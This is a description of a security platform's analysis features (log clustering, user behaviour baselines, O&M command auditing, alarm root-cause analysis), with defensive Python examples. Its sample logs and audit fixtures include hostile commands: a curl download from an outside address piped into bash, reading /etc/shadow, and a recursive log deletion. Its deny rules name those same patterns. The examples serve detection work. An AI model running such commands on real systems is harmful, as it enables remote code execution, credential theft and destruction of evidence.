As business services diversify and security threats become more serious, building a comprehensive security management and control platform means integrating more security prevention and control systems, which in turn generates a large volume of data. Making better use of that platform data to raise overall security management and control capability depends on intelligent analysis of the data.
Intelligent data analysis applies big data technology, machine learning, pattern recognition and other intelligent algorithms to analyze data according to the business scenario at hand and to support more efficient, intelligent management.
Building on big data, machine learning and related technologies, the platform performs intelligent analysis of asset information, user behavior, monitoring data, device logs, network traffic and other data, covering anomaly risk analysis, root cause analysis, intelligent auditing, intelligent O&M, and fault prediction.
1) Anomaly risk analysis, including:
Log anomaly detection: detects abnormal log entries and the risks behind them using log clustering, pattern recognition, machine learning and similar techniques.
Abnormal behavior analysis: builds a behavioral baseline, correlates user and asset behavior, and uses machine learning and similar algorithms to surface suspicious behavior that deviates significantly from the baseline.
Threat attack monitoring: applies artificial intelligence techniques such as machine learning to network traffic, retrospectively analyzes abnormal network behavior, and matches it against threat intelligence and behavior models to uncover potential security threats and previously unknown network attacks.
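The log clustering step behind log anomaly detection is easier to judge with a concrete instance. The following is an added example, not SICAP code: it masks the fields that are variable by construction (timestamps, IP addresses, numbers), buckets lines the way a Drain-style template miner does, and flags templates that account for only a small share of the volume. The log lines are constructed for the example; the bucket key (token count plus first two constant tokens) and the 25% rarity threshold are assumptions a real deployment would tune.

```python
import re
from collections import defaultdict

# Constructed sample log lines for this example (not captured from a real system).
# Six routine key-based logins, then a short password brute force, a successful
# root password login from the same outside address, and a sudo'd download.
SAMPLE_LOGS = [
    "2024-03-01 10:00:01 sshd[2231]: Accepted publickey for alice from 10.0.0.12 port 51234",
    "2024-03-01 10:00:09 sshd[2240]: Accepted publickey for bob from 10.0.0.15 port 51300",
    "2024-03-01 10:01:15 sshd[2255]: Accepted publickey for alice from 10.0.0.12 port 51310",
    "2024-03-01 10:02:30 sshd[2261]: Accepted publickey for carol from 10.0.0.20 port 51400",
    "2024-03-01 10:03:01 sshd[2270]: Accepted publickey for bob from 10.0.0.15 port 51420",
    "2024-03-01 10:03:45 sshd[2277]: Accepted publickey for alice from 10.0.0.12 port 51450",
    "2024-03-01 10:04:12 sshd[2280]: Failed password for root from 203.0.113.7 port 40001",
    "2024-03-01 10:04:20 sshd[2281]: Failed password for root from 203.0.113.7 port 40002",
    "2024-03-01 10:05:00 sshd[2290]: Accepted password for root from 203.0.113.7 port 40003",
    "2024-03-01 10:05:03 sudo: root : TTY=pts/1 ; COMMAND=/usr/bin/curl http://198.51.100.9/x.sh",
]

TS_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
NUM_RE = re.compile(r"\d+")


def mask(line):
    """Replace fields that are variable by construction (timestamp, IPs, numbers)."""
    line = TS_RE.sub("<TS>", line)
    line = IP_RE.sub("<IP>", line)
    return NUM_RE.sub("<NUM>", line)


def _bucket_key(tokens):
    # Coarse bucket in the style of Drain (an assumption for this example): token count
    # plus the first two tokens that are not placeholders. Same key -> same template candidate.
    constant = [t for t in tokens if "<" not in t]
    return (len(tokens), tuple(constant[:2]))


def build_templates(lines):
    """Cluster log lines into templates; positions that vary inside a bucket become <*>."""
    buckets = defaultdict(list)
    for line in lines:
        tokens = mask(line).split()
        buckets[_bucket_key(tokens)].append((tokens, line))
    templates = {}
    for members in buckets.values():
        width = len(members[0][0])
        columns = [{toks[i] for toks, _ in members} for i in range(width)]
        template = " ".join(next(iter(c)) if len(c) == 1 else "<*>" for c in columns)
        templates[template] = [line for _, line in members]
    return templates


def rare_templates(lines, max_share=0.25):
    """Return (template, count, lines) for templates holding at most max_share of all lines."""
    total = len(lines)
    rare = [
        (template, len(members), members)
        for template, members in build_templates(lines).items()
        if len(members) / total <= max_share
    ]
    return sorted(rare, key=lambda item: item[1])


if __name__ == "__main__":
    for template, count, members in rare_templates(SAMPLE_LOGS):
        print(f"[{count}x] {template}")
        for line in members:
            print("    ", line)
```

On the constructed input the six key-based logins collapse into one template with the username wildcarded, while the password brute force, the root password login and the sudo download each surface as a rare template. Rarity alone is a triage signal, not a verdict: a first-of-its-kind template still needs an analyst or a downstream rule (for example matching the source address against threat intelligence) to decide whether it is a risk.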
2) Root cause analysis: for alarms and abnormal events, combines the relationships between assets and business services with intelligent algorithms such as decision trees and correlation analysis to locate the root cause of a problem and shorten fault resolution time.
3) Intelligent auditing: for O&M sessions and historical audit records, applies big data and machine learning algorithms to build a rule base from the character-level commands and user behavior observed; O&M commands and operator actions are then matched against that rule base to judge whether they are normal, so that O&M sessions are audited automatically, and the rule base is updated according to the final audit results.
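The abnormal behavior analysis above (baseline, then deviation) and the intelligent auditing item share one mechanism: a per-user baseline learned from accepted history, a set of static rules that apply regardless of baseline, and a feedback step that folds the auditor's final decision back into the rule base. The block below is an added example of that loop and is not SICAP's implementation; the session records, the deny patterns and the "command verb" granularity of the baseline are all assumptions chosen for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed historical O&M sessions (user, command), assumed already reviewed
# and accepted. Not real audit data.
HISTORY = [
    ("alice", "ls -la /var/log"),
    ("alice", "tail -n 200 /var/log/nginx/access.log"),
    ("alice", "grep -i error /var/log/nginx/error.log"),
    ("alice", "systemctl restart nginx"),
    ("alice", "df -h"),
    ("bob", "kubectl get pods -n payments"),
    ("bob", "kubectl logs payments-api-7c9 -n payments"),
    ("bob", "kubectl rollout restart deployment/payments-api -n payments"),
]

# Constructed new session to audit.
NEW_SESSION = [
    ("alice", "tail -n 50 /var/log/nginx/error.log"),
    ("alice", "netstat -tulpn"),
    ("alice", "cat /etc/shadow"),
    ("alice", "curl -s http://198.51.100.9/x.sh | bash"),
    ("alice", "rm -rf /var/log/nginx"),
]

# Static rules that hold regardless of baseline; the patterns are assumptions for this example.
DENY_PATTERNS = [
    (re.compile(r"\|\s*(ba|z|da)?sh\b"), "pipes content into a shell"),
    (re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*\s+/"), "recursive delete of an absolute path"),
    (re.compile(r"/etc/(shadow|sudoers)\b"), "touches a credential or privilege file"),
    (re.compile(r"\bchmod\s+[0-7]*777\b"), "world-writable permission change"),
]


def verb(command):
    """First token of the command with any directory stripped, e.g. /usr/bin/curl -> curl."""
    return command.split()[0].rsplit("/", 1)[-1]


def build_rulebase(history):
    """Per-user baseline: how often each command verb was seen in accepted sessions."""
    rulebase = defaultdict(Counter)
    for user, command in history:
        rulebase[user][verb(command)] += 1
    return rulebase


def audit_command(rulebase, user, command):
    """Return (verdict, reason): deny on a static rule, review if unseen for the user, else allow."""
    for pattern, reason in DENY_PATTERNS:
        if pattern.search(command):
            return ("deny", reason)
    if verb(command) not in rulebase[user]:
        return ("review", f"'{verb(command)}' never seen in {user}'s accepted sessions")
    return ("allow", "matches user baseline")


def audit_session(rulebase, session):
    """Audit every (user, command) pair of a session in order."""
    return [(cmd, *audit_command(rulebase, user, cmd)) for user, cmd in session]


def record_review(rulebase, user, command, legitimate):
    """Feed the auditor's final decision back: accepted commands extend the user's baseline."""
    if legitimate:
        rulebase[user][verb(command)] += 1


if __name__ == "__main__":
    rb = build_rulebase(HISTORY)
    for cmd, verdict, reason in audit_session(rb, NEW_SESSION):
        print(f"{verdict:6} {cmd!r:48} {reason}")
    # The auditor confirms netstat was legitimate, so it is allowed next time.
    record_review(rb, "alice", "netstat -tulpn", True)
    print(audit_command(rb, "alice", "netstat -an"))
```

Two design points worth keeping when scaling this up: static deny rules are evaluated before the baseline, so a user cannot "train" the system into accepting a dangerous command by repeating it, and only commands an auditor has explicitly accepted feed back into the baseline, which is what makes the rule base update safe rather than self-reinforcing.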
4) Intelligent O&M: alarm and event information raised by the monitoring system is processed with alarm compression strategies, intelligent algorithms, knowledge graphs and other means to determine the root cause of a failure. Comparing the result against the O&M knowledge base then serves two purposes: it provides O&M recommendations that shorten problem resolution time, and in specific scenarios it triggers an O&M playbook that recovers the fault automatically, reports the recovery result to O&M staff, and afterwards reviews the fault and stores the knowledge gained, forming a closed loop of intelligent O&M.
5) Fault prediction: relying on big data analysis and machine learning, a fault model is built for each business scenario, and correlation analysis and deep learning are applied to the relationships among historical alarms. Combined with real-time data from the monitoring system, this supports trend analysis of IT faults and early warning of alarms that are likely to occur, so that faults can be anticipated rather than merely reacted to.
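Root cause analysis over asset and business relationships (item 2) and the alarm compression step of intelligent O&M (item 4) are shown together below in one added example; it is not SICAP's algorithm, and the dependency graph, the alarm stream and the 60-second correlation window are constructed for illustration. Alarms that arrive within the window and are linked through the dependency graph are compressed into a single incident, and the root cause of an incident is the alarmed asset that has no alarmed dependency beneath it.

```python
from collections import defaultdict, deque

# Constructed dependency graph: each asset maps to the assets it depends on.
# Business-facing services sit at the top, shared infrastructure at the bottom.
DEPENDS_ON = {
    "checkout-web": ["payments-api", "auth-api"],
    "payments-api": ["payments-db"],
    "report-job": ["payments-db"],
    "auth-api": ["ldap"],
    "payments-db": ["san-01"],
    "san-01": [],
    "ldap": [],
}

# Constructed alarm stream as (seconds since start, asset, message).
ALARMS = [
    (0, "san-01", "disk write latency > 500 ms"),
    (5, "payments-db", "query timeout"),
    (8, "payments-api", "upstream 504 from payments-db"),
    (9, "report-job", "nightly report failed"),
    (12, "checkout-web", "error rate 35%"),
    (300, "ldap", "bind failures"),
]


def transitive_deps(graph, asset):
    """Every asset that `asset` depends on, directly or indirectly."""
    seen, stack = set(), list(graph.get(asset, []))
    while stack:
        dep = stack.pop()
        if dep not in seen:
            seen.add(dep)
            stack.extend(graph.get(dep, []))
    return seen


def _undirected(graph):
    adj = defaultdict(set)
    for asset, deps in graph.items():
        for dep in deps:
            adj[asset].add(dep)
            adj[dep].add(asset)
    return adj


def connected(graph, a, b):
    """True if a and b are linked by a chain of dependency edges in either direction."""
    adj = _undirected(graph)
    seen, queue = {a}, deque([a])
    while queue:
        node = queue.popleft()
        if node == b:
            return True
        for nxt in adj[node] - seen:
            seen.add(nxt)
            queue.append(nxt)
    return False


def compress_alarms(graph, alarms, window=60):
    """Group alarms into incidents: within `window` seconds of the group's last alarm
    and dependency-connected to at least one asset already in the group."""
    clusters = []
    for alarm in sorted(alarms):
        t, asset, _ = alarm
        for cluster in clusters:
            if t - cluster[-1][0] <= window and any(connected(graph, asset, a) for _, a, _ in cluster):
                cluster.append(alarm)
                break
        else:
            clusters.append([alarm])
    return clusters


def root_causes(graph, cluster):
    """Alarmed assets in the cluster that have no alarmed dependency below them."""
    alarmed = {asset for _, asset, _ in cluster}
    return sorted(a for a in alarmed if not (transitive_deps(graph, a) & alarmed))


def incidents(graph, alarms, window=60):
    """One summary record per compressed incident."""
    return [
        {"root_causes": root_causes(graph, c), "alarm_count": len(c),
         "first": c[0][0], "last": c[-1][0]}
        for c in compress_alarms(graph, alarms, window)
    ]


if __name__ == "__main__":
    for inc in incidents(DEPENDS_ON, ALARMS):
        print(inc)
```

On the constructed stream the five alarms from the storage array up to the checkout front end collapse into one incident whose root cause is `san-01`, and the later LDAP alarm stays a separate incident because it falls outside the window even though it is graph-connected. The correctness of the answer rests entirely on the dependency graph, so a stale asset inventory will produce confident but wrong root causes.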
Going forward, SICAP will pursue in-depth research that is driven by big data, supported by algorithms and oriented to concrete scenarios, extending intelligent data analysis to further scenarios such as risk assessment and intelligent response and building a more intelligent open security management platform.